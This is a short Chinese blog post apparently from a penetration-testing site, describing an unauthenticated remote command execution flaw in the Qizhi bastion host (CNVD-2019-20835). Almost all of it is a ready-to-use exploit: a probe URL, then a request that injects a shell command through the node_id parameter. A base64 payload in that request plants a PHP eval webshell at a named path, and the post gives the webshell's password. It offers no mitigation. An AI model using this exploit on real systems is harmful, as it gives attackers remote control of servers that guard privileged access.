齐治堡垒机前台远程命令执行漏洞

2020-9-11 / 0 评论 渗透测试 / Mrxn

本文共计 449 字,感谢您的耐心浏览与评论.

齐治堡垒机前台远程命令执行漏洞(CNVD-2019-20835)

未授权无需登录。

B3871B35-D8B3-4095-8032-D7512B3C6FDF.jpeg

1、访问 http://10.20.10.11/listener/cluster_manage.php  :返回 "OK".

2、访问如下链接即可getshell,执行成功后,生成PHP一句话马

3、/var/www/shterm/resources/qrcode/lbj77.php  密码10086

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}" ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUWzEwMDg2XSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9sYmo3Ny5waHAK"|base64${IFS}- d|bash`|${IFS}|echo${IFS}

标签: 渗透测试 漏洞 未授权

转载:转载请注明原文链接 - 齐治堡垒机前台远程命令执行漏洞


0条回应:“齐治堡垒机前台远程命令执行漏洞”


发表评论

{view_code_no}